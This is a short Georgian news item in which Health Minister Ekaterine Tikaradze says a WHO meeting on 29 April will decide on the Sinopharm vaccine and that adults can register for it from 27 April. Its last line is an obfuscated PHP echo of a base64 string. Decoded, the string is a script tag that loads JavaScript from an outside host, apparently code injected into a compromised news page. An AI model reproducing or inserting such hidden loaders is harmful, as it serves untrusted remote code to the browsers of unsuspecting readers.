celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრის, ეკატერინე ტიკარაძის განცხადებით, 29 აპრილს ჯანდაცვის მსოფლიო ორგანიზაციაში გაიმართება სხდომა, რომელზეც „სინოფართან“ დაკავშირებით გარკვეული გადაწყვეტილება იქნება მიღებული.
 
მისივე განცხადებით,  „სინოფარმს“ ჯანდაცვის მსოფლიო ორგანიზაციის მხრიდან ავტორიზაცია არ აქვს მინიჭებული, თუმცა, ეყრდნობიან იმ ქვეყნების მკაცრი მარეგულირებლების გადაწყვეტილებას, სადაც „სინოფარმით“ ვაქცინაცია მიმდინარეობს.
 
„29-ში გაიმართება დამატებითი სხდომა მსოფლიო ჯანდაცვის ორგანიზაციაში, სადაც მიიღებენ გარკვეულ გადაწყვეტილებას „სინოფარმთან“ მიმართებით. გარდა ამისა, ჩვენ არაერთ მტკიცებულებაზე დაყრდნობით გვაქვს ინფორმაცია, რომ „სინოფარმი“ არის უსაფრთხო და მილიონობით მოქალაქეს აქვს გამოყენებული. ასევე, ჩვენ ვეყრდნობით იმ მკაცრი მარეგულირებლების გადაწყვეტილებას, რომელ ქვეყნებშიც „სინოფარმით“ ვაქცინაცია მიმდინარეობს“, - განაცხადა ეკატერინე ტიკარაძემ.
 
ცნობისთვის , იმუნიზაციის საბჭოს გადაწყვეტილებით, „სინოფარმით“ ვაქცინაციის პროცესში 18 წლის ზემოთ მოქალაქეები ჩაერთვებიან. მსურველებს 27 აპრილიდან საშუალება ეძლევათ დარეგისტრირდნენ. 
 
 
1147
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");